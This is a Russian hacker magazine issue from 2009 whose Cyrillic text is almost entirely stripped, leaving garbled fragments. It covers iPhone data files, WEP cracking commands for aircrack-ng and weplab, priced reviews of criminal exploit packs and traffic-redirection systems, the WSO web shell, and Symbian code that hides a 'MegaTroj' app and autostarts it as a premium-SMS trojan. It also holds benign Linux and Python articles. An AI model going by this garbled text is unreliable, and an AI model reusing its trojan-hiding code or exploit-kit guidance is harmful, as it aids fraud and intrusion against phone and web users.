, . html- iframe, :
X 03 /123/ 09
>>
<?php
header('Content-type: application/vnd.ms-excel');
header('Content-Disposition: attachment;
filename="downloaded.xls"');
readfile('xls.xls');
?>
/ (timer_outgoing/timer_incoming).
/private/var/mobile/Library/Notes/notes.db
. note_bodies: note_id ( )|data ( html , UTF-8).
, PDF/DOC/XLS . !
. , , :
Note:
ROWID ( -
)|creation_date ( )|title
)|summary
)|contains_cjk (?).
/private/var/mobile/Library/SMS/sms.db
:). message: ROWID|address (
)|date|text
UTF-
8)|flags|replace|svc_center|group_id ( ,
<meta http-equiv="Refresh" content="1;

url=http://ya.ru">
)|association_id|height|UIFlags|version.
msg_group: ROWID|type
url , ( ). ,
. ,
- .
4. LOCATION SPOOFING
...
, , .
, . ,
iPhone/iPod
. :
www.syssec.ch/press/location-spoofing-attacks-on-the-iphoneand-ipod. ,
:). : Apple
iPhone 2g Apple iPod touch , GSM-
WiFi-. WiFi-
http://www.skyhookwireless.com (,
).
iPod touch GSM-
, WiFi- . , , ,
( )
( ), .
, -, , . iPhone
2g, , ,
GSM. ,
, ,
. , iPhone
, GSM.
dvd

AppleStore
.

.
(, 0)|newest_
message (ID )|unread_count (- ).

. group_member: ROWID|group_
id|address ( ). .
, , .
,

.
/private/var/mobile/Library/WebKit/Databases/
Databases.db , WebKit. . Databases: guid|origin
(, gmail http_mail.google.
com_0)|name ( GmailMobileWeb)|displayName|e
stimatedSize ( )|path ( ).
. /private/var/
mobile/Library/WebKit/Databases/<origin Databases.
Databases>/<path Databases.Databases>.
.
/private/var/mobile/Library/AddressBook/
AddressBook.sqlitedb /private/var/mobile/
Library/AddressBook/AddressBookImages.sqlitedb
( ).
ABPerson. : ROWID|First
()|Last ()|Middle ()|FirstPhonetic|Midd
lePhonetic|LastPhonetic ( )|Organization|De
partment|Note|Kind|Birthday|JobTitle|Nickname|Prefix|Suff
ix|FirstSort|LastSort|CreationDate|ModificationDate|Compo
siteNameFallback|ExternalIdentifier|StoreID|DisplayName|F
irstSortSection|LastSortSection|FirstSortLanguageIndex|L
. ?
, :
. ,
, ? . iPhone sqlite.
(, -, ,
) ,
. :
/private/var/mobile/Library/CallHistory/call_
history.db . call:
ROWID ( )|address ( )|date (
)|duration (
)|flags ( , )|id ( ?). _SqliteDatabaseProperties -
, ,
X 03 /123/ 09
astSortLanguageIndex.
,
.
. , .
. .
: unix- !

. Apple iPhone
. , ,
, . , : http://
oxod.ru. z
061

ENTHUSIAST INTERNET AWARD 2008
26
web- Enthusiast Internet

net
Award 2008 ( Gameland).
11
web ,
$50 000.
- en
thusiast inte
rnet award 20

08
,
$25 000
ga

meland

lifes

lides.ru.

$15

00
0
hobiz.ru

0
0
0
0
1
$
.ru.
wifi4all
11

:
Enthusiast Internet Award ,

web, - .
. 3 , Enthusiast Internet Award 2009, 30 000 000
. 1300 .
,
, .
Gameland .
Enthusiast Internet Award 2008 Gameland
: Oklick (
),
Microsoft mail.ru,
mail.ru .
.
>>
D0ZNP
/ HTTP://OXOD.RU /
WEP
, WEPLAB AIRCRACK
. , , . WPA ... , WEP! ,

? .
,
? WEP-
weplab aircrack.
,
, .
UNIX-. . Debian,
, . , aircrack Windows, weplab
Cygwin. ,
. ? ,
. , , ,
.
.
, , WEP.
.
WEPLAB
64- WEP-.
128- k 128. ,
64- , 128-.
64- : ,
- . . :
( ), . - ,
. :
064
weplab b dump.pcap
//
cat slovar.dict | weplab y dump.pcap
//
weplab r dump.pcap
//
.
. , ,
WEP . ,
, ?
? , ?
, ? ?
.
WEPLAB
, ,
, , : ,
.

WEP. ,
WEP-
WPA-! , ,
.
X 03 /123/ 09
>>
Aircrack
info

.
.
warning
! ,

!
Aircrack Windows
. , :
weplab,
. ,
. 50.000
64- 200.000 128-
, . :
( ,
). 64- WEP- 128- 10/1
(20.000 , 2.000 20 ),
X 03 /123/ 09
weplab ( --perc). 80%

(
100% 1.4),
! , , 400.000
64- WEP, weplab.
, 5 .

20 50.000 128- WEP
5.000 WPA.
wepcrack. 200.000
, .
!
065
>>
Aircrack , WPA
AIRCRACK
. aircrack-ng. WPA, WEP.

MAC-
. ,
? .
wep-.
WEP, . :
PTW (Pyshkin, Tews, Weinmann) FMS (Fluhrer, Mantin, Shamir).
. :
aircrack-ng dump.pcap
//
aircrack-ng b 00:00:00:00:00:00
//
aircrack-ng y
//
AIRCRACK-NG
. :
WPA, aircrack WPA, ,
WEP- ( - ) -
066
. 1.000.000 128- WEP-

1.000 WPA. aircrack
, , WPA.
,
. ,
(aircrack-ng a1 dump.pcap), .
, ,
.
,
. , ,
450.000 128- WEP,
, 200.000 , 128-
WEP-. Aircrack ( 200.000 ).
(aircrack-ng d XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:
XX:XX:XX). 450.000 , !
100 , : aircrack
( ; ,
) 9 100.
aircrack
. , aircrack-ng
. , ,
, IDS.
X 03 /123/ 09
>>
weplab
(
,
, ) , , --.

, , ? ,
! , ,
486-
.
USB-.
USB- ( WiFi-)
busybox.
.
, .
, ,
, .
,
.
, , :
aircrack-ng.
aireplay,
(
).
r fakedump.pcap
.

. txpower
iwconfig. (iwconfig eth1
txpower 15) (iwconfig eth1 txpower
30mW). ,
sens, rts, frag, power .
IDS .
, honeypot.
.
-
.
tcpdump ,
.
,
, .
X 03 /123/ 09
Aircrack: !
,
, , IV
,
WEP. , ,
128- 104 ,
64- 40 . . - .

. , ,
. ,
.

.
, ,

, .

oxod.ru. z
weplab
links
aircrack-ng.org

aircrack.
weplab.sourceforge.
net weplab.
oxod.ru .
,
.
www.cdc.informatik.
tu-darmstadt.de/
aircrack-ptw PTW.
aircrack-ng.org/
doku.php?id=links&
DokuWiki=d63d97e
f16cadcdb9e1281e
83d4e5875#techniq
ue_papers
WEP.
067
>>
BALASEK
-. :
, , , ...
, . ,
, n- . ?
, - .
( z
, ,
).
,
(, , ..),
.
,
,
, exe.
.
,
. , , .
,
iframe-, ,
.
, .
(
).
,
.
?
, :
1.
2.
3.
4.
5.
068
, ,
Fiesta. 2.4,
:
7 ,
Acrobat <= 8.1.2
4/5/6 30%
9.2 15%
( //)
$700
, ( ) 30%, , , .
,
. , .
:).
Unique Pack 1.1 Full.
, :
1. MDAC ()
2. PDF VIS PDF-
(v.8.1.1 + v.8.1.2)
3. MS OFFICE SNAPSHOT
4. IE 7 XML SPL XML IE 7
5. FF EMBED
30%

$600 + $100

.
X 03 /123/ 09
>>
Armitage
G-Pack:
- 30%
IE <= 6 , IE 7

,
$100
: ,
-. -

:).
Icepack. :

IP

ftp- ftp-

(
, )
(,
exe)
$200
Fiesta

IP

.

,

:
SQL
TEXT DB
TEXT-

-

(
, , ..)
$1000
,
. , ,
USA- . ,
, , .
.
Infector by xod.
:
, .
,
.
. ,
, .
, , , :).
Neosploit-2, , , , , , . , :

PHP-
-
,
.
( )
, -
X 03 /123/ 09
069
>>
G-Pack
ICE-Pack
javascript-
exe ( 1 )
. exe-
, exe

IP
, , ,

IP (
)
. ,
exe.
(, )
IE FireFox
$1500
,
. , . -
. ,
, :).

,
web-. Sutra TDS.
:
URL:
1. ()
2. ( URL)

:
1. ( GeoIP)
2. / ( )
3. (/ )
4. IP
5. HTTP_REFERER
6. HTTP_REFERER
7. IP- IP-
8.

: / / / /
/ / / /
070

/
.
UPTIME BOT
URL. URL , ( 4** 5**), UPTIME BOT URL ( )
URL
UPTIME BOT URL
, , UPTIME BOT URL
UPTIME BOT
$100,
. , .
!
, 2-3 ,
.

exe :).

,
- . , , . 50%
- 20% USA.

. ,
, , 1-2k .
.
, g
. z
X 03 /123/ 09
>>
R0ID
/ R0ID@BK.RU /
:ADVANCED TRAFFIC
DIRECT SYSTEM
: *NIX/WIN
:ADVANCED SCRIPTS

.
, ,
, Advanced Traffic Direct
System .

(aka TDS),
. ,
, :
,

( GeoIP)
( IP cookies)
URL
.
:
1. Primary-: ,

2. Secondary-:
,

(confg.php) TDS.
:
$UseCron (On/Off) /
072
$UseURLCron (On/Off)
; Off
URLs
$CheckURLTimeOut
,
, , .
= 5 , ,
$OptimizeTables (On/Off) /
. ,
TDS

$DoCronLog (On/Off) /

$PassQueryString (On/Off) ,
out.php (
URL)
$VisualTimeOffset . , , ,
.
, , ,

.
Settings, :
New Password, Confirm Password

Alternative URL URL,
, -

Path to GeoIP GeoIP, , /usr/local/bin/geoiplookup.

Unknown
Save full stats ,

Check URLs
URL .
URL
. .
, :
1. Cant open file: tbl_name.MYD

tbl_name
- .
:
a) REPAIR TABLE tbl_name
( tbl_name
)
b) repair.php
(./r_admin/tools/repair.php),
2.
Unknown GeoIP,
GeoIP,
Settings
3.
Settings ,
./r_admin/config/
config.php, ,
: DLSECURE MODULE
: *NIX/WIN
: NUR, GREEN_BEAR AND WINUX
-,
.
,
,
X 03 /123/ 09
>>

PHP-.

,
. , -, .
DLsecure module. ,

php-.
PHP-,

.
:

IP-
XSS

SQL-

include-
DDoS-

ftp- ssh-

,
XSS/SQL/INCLUDE-, variables.php:
$bad_sql = array("union,"select","
from","where","insert"," or "," and
","/\*","",);
$bad_include =
array("http://","../",".php",".
phtml",".php3",".php4","./",".
php5",);
$bad_xss = array("<script","docume
nt.cookie","javascript:",);
.
. , - (
z).
( )
,
,
. ,

( ).
: , ?.
, , ,
Ponchiks universal fake
:). ,
Ponchik,
. ,
:
1. /
2.
3.
-
1.
2.
3.
4.
:)
. ,
. (aka )
,

,
. , , ...
: HIASM
: WINDOWS 2000/XP
:HIASM STUDIO
: PONCHIKS UNIVERSAL
FAKE
: *NIX/WIN
: PONCHIK
:)
X 03 /123/ 09

,
,
/PHP-, /++,
!
. HiAsm. ,

.
,
- . .

, , , .

( ),
, ,
.
, ,
:).
: WSO
: *NIX/WIN
: ORB
web-shell
,
-.
,
. ,
, web shell by
oRb ( WSO). -, ,
,
. WSO
:).
16 ,
:

SQL-
, , , , , ,
,
, , ,

POST-
PHP-

-
,
Safe-mode ( ,
)
FTP/MySQL-
C/Perl

, - *nix-.
,
, , :).z
073

1 2009
2008
!
www.gameland-award.ru
2009

Metal Gear Solid 4: Guns of the Patriots

Command & Conquer: Red Alert 3
Tomb Raider: Underworld
Super Smash Bros. Brawl
Guitar Hero: World Tour
Grand Theft Auto IV
LittleBigPlanet
Prince of Persia
Devil May Cry 4
Soul Calibur IV
Gears of War 2
Mirrors Edge
Fallout 3
Fable II
>>
MIFRILL
/ MIFRILL@RIDDICK.RU /
, .
, , ,
. (
), . , Windows .
WHO IS MISTER RUSSINOVICH?

, (Mark Russinovich) .
, . ,
, , , !
, ,
,
, ,
Windows. 2006 Top 5 , eWeek, .
, , (,
076
) -,
: .
, IBM ( ).
. 1996 ,
(Bryce Cogswell),
, Winternals Software LP.
freeware
MS Windows. ,
,
, .
X 03 /123/ 09
>>
RootkitRevealer

Sysinternals.com ( ntinternals),
60 . , ,
Process Monitor ( Filemon Regmon), Process
Explorer, RootkitRevealer NTFSDOS, , , (, NTFSDOS NTFS- MS-DOS).
,
NTFS DOS. , ,
, .
,
. , Winternals
Administrator Pak. ,
Linux, Windows, , .
64- . , ,
Microsoft, .

. 2006 Winternals Software
, Sysinternals
. ,
, Windows,
, .
, Microsoft,
Winternals Software.
Sysinternals . , ,
,
Linux, NT Locksmith,

. , Microsoft
. ,
, Sysinternals
.
Microsoft Technical Fellow, , ,
.
,
(Platform and Services Division).
X 03 /123/ 09
, ! :)

,
malware-. ,
2006 :).
, ,
,
. 2005
, Microsoft. ,
RootkitRevealer,
, . ,
: ,
, ,
,
, RKR.
RootkitRevealer, Sony BMG Music Entertainment,
Amazon.com. ,
077
>>
HKLM\System\CurrentControlSet\SafeBoot, .
, , , ,
, .
IT- , , .
Sony,
, , ,
. , , , ,
, . ,
, , .
,
. , , Microsoft Windows Internals
( Microsoft Windows).
,
TechNet Magazine Windows IT Pro ( Windows NT
Magazine). , ,
http://blogs.technet.com/MarkRussinovich,
http://blogs.technet.com/mark_russinovich
.
Microsoft.
, , ,
. , , Windows 7 , ,
Winternals . . ,
,
, , ,
, . , , , -
Sysinternals
DRM (Digital rights management), ,

. ,
, Sony ,

078
,
Microsoft. ,
,
. z
X 03 /123/ 09
>> unixoid

/ DHSILABS@MAIL.RU /

UBUNTU 8.10
,
. .
, , .

. , .
:
Reconstructor (reconstructor.aperantis.com).
ISO- Ubuntu (www.ubuntu.com).
6 Linux-.
.
Reconstructor ISO- Ubuntu,
. , (2.8)
Hardy, Ubuntu.
, Intrepid
Ibex (Ubuntu 8.10), .
6 ,
LiveCD Ubuntu 5 +
( 700 ).
, .

, (
). sudo. ( , root). Next ,
080
LiveCD .
. LiveCD, ,

, Ubuntu.
, ISO-
Ubuntu . ,
Windows-, 700
Linux- ( 6
openSUSE ). .
, LiveCD Ubuntu
( ). root,
.
! LiveCD Create Remaster Directory, Create Root Directory, Create Initial Ramdisk
Directory. ,
.
, , (X 03 /123/ 09
>> unixoid
, ,
..) ,
. -.
. , 5-10.

, .
Boot Screen.
Live CD Splash GRUB.
GIMP. : PCX, , 256
, 640480 800600. Live CD Text Color
GRUB.
GRUB, .
Ubuntu , Upslash Filename.
SO- gnome-look.org,
. GIMP,
, PNG ( 640480,
800600 , , 256 )
Generate. PNG-,
SO-,
Usplash Filename.
. ,
.
Usplash. 640480,
800600. Usplash
LiveCD, Usplash .
, , Upslash 800x600
, LiveCD.
!
, LiveCD
Usplash,
Usplash Ubuntu. :

, Ubuntu. , Usplash,
.
gnome-look, , ( : ,
Background Color).
Desktop , Theme ,
.
APT OPTIMIZATION
Apt ,
.
, . . ,
Ubuntu 8.04, ,
Ubuntu 8.10.
( ),
Optimization LiveCD.
, LiveCD
(
).
, , , .
. Modules
. , GIMP OpenOffice .
MPlayer, Flash-
Firefox. (Execute) (Run on boot). , MPlayer
, MPlayer Execute
Apply.
(Estimated ISO Size).
702 , 745 .
,
links
Denix:
denix.dkws.org.ua.

:
gnome-look.org.

Ubuntu (. )
:
citkit.ru/articles/222.
Boot Screen
GNOME
Login GDM- (GNOME Display
Manager).
. ,
. gnome-look.org,
(),
, .
Splash Screen ,
. -,
X 03 /123/ 09
081
>> unixoid
info
,
?
GIMP,

256.

PNG-.

?
gnome-look.org.

.
:

GIMP,

gedit.
.

Ubuntu
Customization Kit,
, ,
.
UCK
Ubuntu
8.10.
082
Modules
Custom apt-get (install) Apply.

, , 1 2
3. ,
. ( ), , ,
. , Custom apt-get (remove)
.
, .
root- , .
, .
(
),
sudo mc mc (
?) root.
, ISO.
/media/disk/livecd.
initrd (, , ?),
remaster ( ISO), root (
).
?
remaster *.exe- autorun.ini.
1,3 . , ?
initrd/etc/casper.conf ,
GNOME ( Denix
session user):
Gnome
export
export
export
export
USERNAME="denix"
USERFULLNAME="Denix session user"
HOST="denix"
BUILD_SYSTEM="Denix"
,
, Apply
ISO. Next .
ISO
!
LiveCD, , Initial Ramdisk,
SquashFS Root, Live CD (ISO). LiveCD, , , ,
!
!
Filename LiveCD. ,
( 750 ),
ISO- . Description .
Next
.
ISO
(, Nero for Linux) .
GRUB. , .

X 03 /123/ 09
>> unixoid
Denix
.
GDM-.
. - .
LiveCD ,
, : Ubuntu,
, LiveCD,
LiveCD !
: ( ), . mc root
/var/cache/apt/archives:

! , :
( )
Usplash Ubuntu, ;
Examples Ubuntu;
GNOME Ubuntu;
.
Usplash .
sudo mc. ,
.
/media/disk/livecd, /media/disk/livecd/root.
/usr/lib/usplash LiveCD ( , /media/
disk/livecd/root/usr/lib/usplash). SO- Usplash.
Usplash- 800600?
usplash-theme-ubuntu.so. ,
usplash ,
. ,
400 , 2 . . /usr/share/example-content LiveCD (/media/disk/
livecd/root/usr/share/example-content). , ,
.
.
. ,
. , usplash ,
. . OGG
(
OGG oggenc) /usr/share/sounds.

/usr/share/sounds/ubuntu,
OGG- desktop-login.ogg
, GNOME.
, GNOME desktop-logout.ogg.
! ,
, .
Terminal :
$ sudo apt-get install <_>
$ sudo apt-get remove <_>
, , .
X 03 /123/ 09
$ sudo mc
/media/disk/livecd/root
LiveCD. deb /var/cache/apt/archives:
$ mkdir deb
$ cp /var/cache/apt/archives/*.deb /media/disk/livecd/
root/deb
LiveCD.
:
$
$
$
$
cd deb
dpkg i *.deb
rm *.deb
exit
deb, ,
. : ,
, !
deb- , LiveCD . .

. , , !
: LiveCD
OpenOffice GIMP, ,
MPlayer, CD. 695 . ,
DVD. Denix 0.5 Full 981 .
OpenOffice 2.4 OpenOffice 3.0 Pro
, , MPlayer, Thunderbird, FileZilla. , . CD-,
, DVD? , , !z
083
>> unixoid
J1M
/ ZOBNIN@GMAIL.COM/
LINUX
Linux .

,
. Linux ,
. .
2007 . 2.6.20-2.6.23
2.6.20 , i386. 2.6.21
WMI (Virtual Machine
Interface), VMWare
. Linux
VMWare - . 2.6.23 Xen
lguest (Linux Linux).
2.6.20 KVM (Kernelbased Virtual Machine).
SVM/AMD-V Intel VT. ,
,
.

qemu .
2.6.21 KVM
/ .
2.6.23 KVM .
084
Fault injection, .
,
.
SGI Linux Slab allocator
SLUB, SMP- . Slab allocator , , .
2.6.23.
.
, Devicescape, WiFi-. , , MAC, WEP, WPA, QoS,
802.11g ,
.
FireWire-. , ,
.
X 03 /123/ 09
>> unixoid
Linux Kernel Summit 2007

CFS (Completely Fair
Scheduler). , ,
rbtree,
.
CFS ()
(HZ).
2.6.24 25
Control Groups
cgroups. ,
, .
,
.
,
( ),
Task Control Groups,
CFS Cpusets
( ).
CFS. 10%
Fair Group Scheduling,
. (, multimedia, net).
, Documentation/sched-designCFS.txt.
Tickless x86-64, PPC, ARM,
MIPS UML (User Mode Linux).
,
.
MMC
SDIO (Secure Digital I/O) SPI. , , SDIO (, ),
, - SD
(, GPS-, - ..).
Wireless USB,
USB-. ,
USB- , .
, 0 /sys/bus/
usb/devices//authorized.
X 03 /123/ 09
.
.
Large Receive Offload (LRO). TCP-
, .
2.6.25 17
Memory Resource Controller
(Task Control Groups).
,
. OpenVZ
.

. ,
,
.
proc
pagemaps,
,
.
SMACK,
LSM-. SMACK (, , ..),
, SELinux.
, LatencyTOP (www.
latencytop.org) . LatencyTOP,
.

, Exec Shield (people.redhat.com/mingo/
exec-shield)! brk()
,
.
Volkswagen CAN
(Controller area network)
.
ACPI, API
( ,
).
Ext4 , :
085
>> unixoid
Ext4 IOZone
1. , 64 .
2. .
3. , ,
.
4. inode NFS .
5. Extent-based (
).
6. .
, , .
MN10300/AM33,
c NAS Orion.
2.6.26 14
, mount
--bind, 14 .
, root-, .
KVM,
, IA64, PPC S390
.
, 2.6.22,
Kernel.org Linux-
086
802.11s, Open80211s (www.open80211s.org).

Per-process securebits
setuid-
, (
).
cgroups (Control Groups)
.
,
memtest (www.memtest.org),
.
memtest .

/sys/class/bdi,

/proc/$PID/mountinfo.
PCI Express ASPM
(Active State Power Management).
. ,
KGDB,
. !
2.6.27 9
Linux UBIFS,
Nokia
flash- . UBIFS
JFFS2
, ,
.
UBIFS, OMFS (Sonicblue Optimized MPEG File System support),
MPEG-
-.
Multiqueue networking,
. ,
Wireless Multimedia
Extension, ,
.
, , close-on-exec.
X 03 /123/ 09
>> unixoid
Changelog Linux 5.7
fork().
, ,
.
,
kdump kexec. , .
kdump , kexec . ,
ACPI.

SCSI- SATA-, SBC Data Integrity Field
External Path Protection .
mmiotrace, /, .
, , .
firmware .
/lib/firmware make modules_install
.
Ext4 .
write()
,
( , ). . ZFS, XFS, Btrfs Reiser4.
gprca (mxhaard.free.fr/download.html)
230 USB-.
: Marvell Loki.
2.6.28 25
Ext4 . , .
GEM (Graphics Execution Manager), . GEM
Intel
.
, (
, !) .
GEM i915,
3D- 50%.
Wireless USB X 03 /123/ 09
KGDB
UWB (Ultra Wide Band), - (3.1-10.6 )

( 10 ). ,
UWB-, Wireless USB 1.0.

. - (
), ,
(, malloc()).
cgroup ,
.
. ,
.
. Linux
!
netfilter
TPROXY iptables. Multiqueue networking .
Linux, ,
, , , :
1. Linux
. , , , , .
2. Linux , ,
-, , . , , .
3.
, (,
, ).
4. ,
.
5. . z
087
>> coding

/ ZANITO@GMAIL.COM /
-, ,
. , . , , . ,
, . z , ,
.
.
! -,
, ? -,
, . -,
, .
,
.

, :
1. ,
xakep.ru.
2.
088
-.
3. , ,
.
4. ,
: , . -.
5. .
. ? ,
. ,
, , , , .
, ,
.
X 03 /123/ 09
>> coding
? , , :
1. , .
2. ( !) . ,
.
3. , /, , /
.
4. ,
, , , ,
, .
5. , ,
.
,
. ,
, , . .
, ,
, .
,
?
.
:
1. ( ) ;
.
2. , ,
, .
3. ,
, , .
4. .
, MS Project. ?
, , , ,
.

, ,
, .
, ,
. , .
, ,
. ,
, , ,
, .
-, -,
( ),
.
.
, , ,
.
,
. ,
-
- - , .
, .
. ,
.
.
, .
. , ,
. ,
, 666 ,
- . ,
! , .
.
,
71, z
, z , .
, (
CuTTer). , . -
:
. ,
.
,
. ,
HTML - 250000 .
, . , .
, , , ,
,
,
, .
-][-. ,
: ,
, ?
. - , -,

.

,
. X 03 /123/ 09
089
>> coding

?
-
, :
.
,
, , ,
. ,
, -
. , ,
4-5 15-20 .
20-30
.
30, 40,
50 , . 40-50
. ,
, ,
. , .
1-3 ../,
, 10-15 ../, - .
, 17-20 ,
.
- ,
.
.
- .
.
, .
, ,
, .
, (, !),
.

- ( ,
PHP+AJAX) , ,
. Java, -
Web. -
;
.
, ,
, -
; ,
.
, , ,
Flash HTML. Google -
freelance programmers,
. , ! , ,
, , , ,
.
.
, . , , ,
, .
,
. ,
090
,
. . ,

. ,
.
.
. , ,
,
, .
, . ,
.
,
.
? ? , ,
.
, ,
. ,

( , ).
, ,
,
. ,
, ,
.
, ,
- . ,
, - . , ,
( ). ,

.
, .
, , , .
,
/, ,
.

, .
? ,
, 2 .. ,
10 ..? - ,
( ,
) open-source . ,
.
( ),
. -
1-3 . ,
, , .

.
X 03 /123/ 09
>> coding
.
. ,
? , VIP Depeche Mode . ,
, . .
.
, , .
, ,
- , . , .Net 4.0
, ,
ASP.NET MVC!
, ,
. .
.
, .
, ,
. 2-3
, .
P
, , , , . ,
. , .
-, Zihotki, ASP.NET,
,
. , .

. ,
, ,
. , , ,
, , , ( ).
,
. , -
, .

, .
, .
, , .
, ,
. , ,
, .
. ,
- , . . . .
: ,
, . , . ,
, , .
, ,
4-5 .
. , ,
. , .

PHP. .NET Java
( ),
Pyton Ruby.
X 03 /123/ 09
Zihotki

!
, , ,
, .
,
,
.
( ), fuck .
,
- , ,
. ,
.
, . , ,
.
?
; ,
,
. .
. z
091
>> coding

/ ALEKSEY.CHERKES@GMAIL.COM /
PYTHON
Python .
, Star Wars: Episode II
Tommy Burnette, , Industrial Light
Python Google, ,
. Google Python,
, .
Peter Norvig, , Google, Inc.
, Python.

: ,
, - .
, , ;). , Python
c .
. , , ,
. , Python . 2,
10 , Java!
LETS PLAY!
Python .

. ? >>>
092
, . ( ).
>>> 2 + 2
4
,
:).
>>> tax = 12.5 / 100 #
>>> price = 100.50
>>> price * tax
12.5625
>>> price + _
113.0625
>>> round(_, 2)

. , X 03 /123/ 09
>> coding
>>> for x in list:
...
print x, len(x)
Python 6
is 2
cool 4
!1
Emacs IDE Python
. ,
.

, - ,
Python ,
Python
. ,
.
.
Python ,
.
- . :
>>> # .
... # .
... a, b = 0, 1
>>> while b < 10:
...
print b
...
a, b = b, a + b
112358
Python for
( foreach).
, ? List
. ,
.
. ,
, list.
, , ,
.
, ( ).
(
) .
range(), -.

: ( -),
( ), ( ), (- )
( ).
, .
, , (
,
). ,
,
. -,
..
, .
links
http://python.org
,
,

.
http://www.intuit.ru/
department/pl/python

.
ru.diveintopython.
org/toc.html

Python.
Python MatLab
, ( !) ( , ,
). .
, !
,
. , , -
. . ,
Python . ,
. , , .
- .
( ).
Python x
y, .
x, y = y, x!
, for.
:
>>> # .
... list = ['Python', 'is', 'cool', '!']
X 03 /123/ 09
093
>> coding
ForecastWatch.com Python

Python . ,
,
(, ..).
(, ), .
, .
, .
:
>>> def make(a):
...
return lambda x: x**a
>>> f2 = make(2)
>>> f4 = make(4)
>>> for i in [1, 2, 3]: print f2(i)
149
>>> for i in [1, 2, 3]: print f4(i)
1, 16, 81
.
. Python () . lambda- ( , lambda-,
). lambda
x: x**a , x
, (** ).
make.
, .
(closures). , .
a,
.
make, .
. , a, ,
. make
a. make (!),
. , :).
, Python . , -
(). ,
. . : ,
(- - ),
.. , ,
,
094
Python
. :
CPython .
. , Python ISO ANSI,
CPython. ,
. -,
. *nix-, Win ..
Jython, IronPython JVM.
, Java -.
Java- Python-. . ,
Python.
IronPython , Jython, .Net. .Net- Python-
.
CPython-.
Stackless Python CPython. .
(GIL). ,
,
.
PyPy Python, Python!
.
(Javascript, LLVM, CLI
.).
PyS60 Python Nokia.
CPython c
Symbian OS.
( ), ,
. Python
.
. :
>>> def logger(f):
...
def ret( *args, **kwargs ):
print "enter in", f.__name__
...
...
f( *args, **kwargs)
...
print "exit from", f.__name__
...
return ret
>>>
>>> @logger
... def foo(x):
print "foo:", x
...
>>>
>>> foo("hello")
enter in foo
foo: hello
exit from foo
foo @logger.
, . ,
@logger foo
: foo = logger(foo). , foo ,
@logger , foo.
, ,
.
X 03 /123/ 09
>> coding
Python,
, : def logger(f):
return f. ,

, Python - , - - . . , , , , Python
. .
.
, ,
, , .
, - .
, ,
. obj.f(),
obj, , ,
f. . .
Python . !
. , !
.
, - . ,
Python . (
!). .
, , .

Python . , Python (Batteries Included). ,
(CPython) , . :
;
;
X 03 /123/ 09
;
;
, , ;
( );
- (mime,
smtp, pop, jsoon, http, ftp, nntp telnet, cookie, cgi .);
xml- ( dom sax-);
(zip);
(
);
framework -;
;
;
;
;
;
(md5, sha, hmac, hashlib);
( , );
(IPC);
;
;
c Tk ( GUI).
, ! ,
Python.
. ,
,
. Python, ,
! Python
.
Python , ,
, -.
, Python . , , ][
:). z
095
>> coding

/ ROOT@DTARASOV.RU /
CEikonEnv::Static()->
RootWin().EnableReceiptOfFocus(
EFalse);
//

RootWin().SetOrdinalPosition(1000,
ECoeWinPriorityNeverAtFront);
#include <startupitem.rh>
RESOURCE STARTUP_ITEM_INFO
blacklist
{
executable_name = c:\\sys\\
bin\\YourApp.exe;
recovery = EStartupItemExPolicy
None;
}
-
SYMBIAN
void CMegaTrojAppUi::
HandleForegroundEventL
(TBool aForeground)
{
switch (aForeground)
{
case ETrue:
{
CEikonEnv::Static()->RootWin().
SetOrdinalPosition
(0, ECoeWinPriorityNormal);
TApaTask task(iEikonEnv>WsSession());
task.SetWgId(CEikonEnv::Static()->
RootWin().Identifier());
task.SendToBackground();
}
break;
}
}
SYMBIAN? !
, , sms .
, . , .
- Nokia,
Samsung LG S60.
.

. ,
,
, ,
( ,
sms, GPRS ..). ,
, :
1. , ,
sms, . 93- 103- z.
2. - SMS.
.
096
Premium SMS 0,5 $ 5$ , ( ) .

3. ,
GPS-,
, , .
.
,
.
, , -.
- , ,
-.
, .
Premium SMS ( ,
) .
Symbian. ,
.
X 03 /123/ 09
>> coding

,
, ,
sms, .
,
.
,
,
, , , sms. ,
. , ? ,
Symbian tcp sockets ( HTTP
over TCP)
(Internet Access Point). ,
, .
, ,
.
X 03 /123/ 09

. ,
:
(
, task list).
.

(IAP).
,
.

.
.
, , ,
, Symbian 9, ,
SymbianSigned.
097
>> coding
warning
z
,

.

.
, Symbian,
, , ,
.
, , ,
Symbian ( ).

, .
Carbide C++,
Visual Studio.NET Carbide.
VS. Symbian Hello
World Application (,
SDK, SDK
). .
, :
1) , AIF_DATA Symbain
7.x-8.x APP_REGISTRATION_INFO Symbian 9.x.
, UID .
:
hidden = KAppIsHidden;

.
2) -
098
UpdateTaskNameL,
Task-:
void CMegaTroj::UpdateTaskNameL
(CApaWindowGroupName*aWgName)
{
CAknDocument::UpdateTaskNameL(aWgName);
//
UpdateTaskNameL
aWgName->SetHidden(ETrue);
// -
aWgName->SetSystem(ETrue);
}
3) Symbian 7/8.
AppUi- ,
:
RootWin().EnableReceiptOfFocus(EFalse);
//
RootWin().SetOrdinalPosition(-1000,
ECoeWinPriorityNeverAtFront);
Symbian 9.
Symbian 7/8 , Symbian 9
, .

CAknViewAppUi ( , , AppUi-)
HandleForegroundEventL, ,
:
X 03 /123/ 09
>> coding
void CMegaTrojAppUi::HandleForegroundEventL
(TBool aForeground)
{
switch (aForeground) {
case ETrue:
{
CEikonEnv::Static()->RootWin().SetOrdinalPosition
(0, ECoeWinPriorityNormal);
TApaTask task(iEikonEnv->WsSession());
task.SetWgId(
CEikonEnv::Static()->RootWin().Identifier());
task.SendToBackground();
}
Symbian 9. , , .
, :
1) (*.rss), UID3 .
, UID3 0x12345678, 12345678.
rss. :
#include <startupitem.rh>
RESOURCE STARTUP_ITEM_INFO blacklist
{
executable_name = "c:\\sys\\bin\\YourApp.exe";
recovery = EStartupItemExPolicyNone;
}
2) MMP- :
break;
}
}
,
, task- ,
-
.

Symbian 7/8 Symbian 9.
Symbian 7/8. Symbian OS 9. ,

recognizers. Recognizers MIME- , , ,
,
.
, MIME-,
Series60 , Document Handler. ,
, , MMS-, WAP-, bluetooth
.. ,
, - . Series60 embedded
launching, ,
, ,
.
.
WEB- jpg-.
Image Viewer, .
MIME (UID).
Symbian OS ,
MIME-, recognizers.
recognizer dll, mdl c:\system\recogs .
MIME- / UID
recognizer.
.
:
recognizer *.bt ( ; ).
recognizera, , , , ,
, .
, , ,
. -
.
X 03 /123/ 09
START RESOURCE 12345678.rss

TARGETPATH \resource\apps
END
3) pkg- : C:\Symbian\9.1\S60_3rd_MR\
epoc32\data\z\resource\apps\12345678.rsc"-"c:\private\
101f875a\import\[12345678].rsc.
c:\private\101f875a\import ,
.
, , Symbian. .

, . :
1)
. GPRS-, WAP-
MMS- . CApSelect, ,
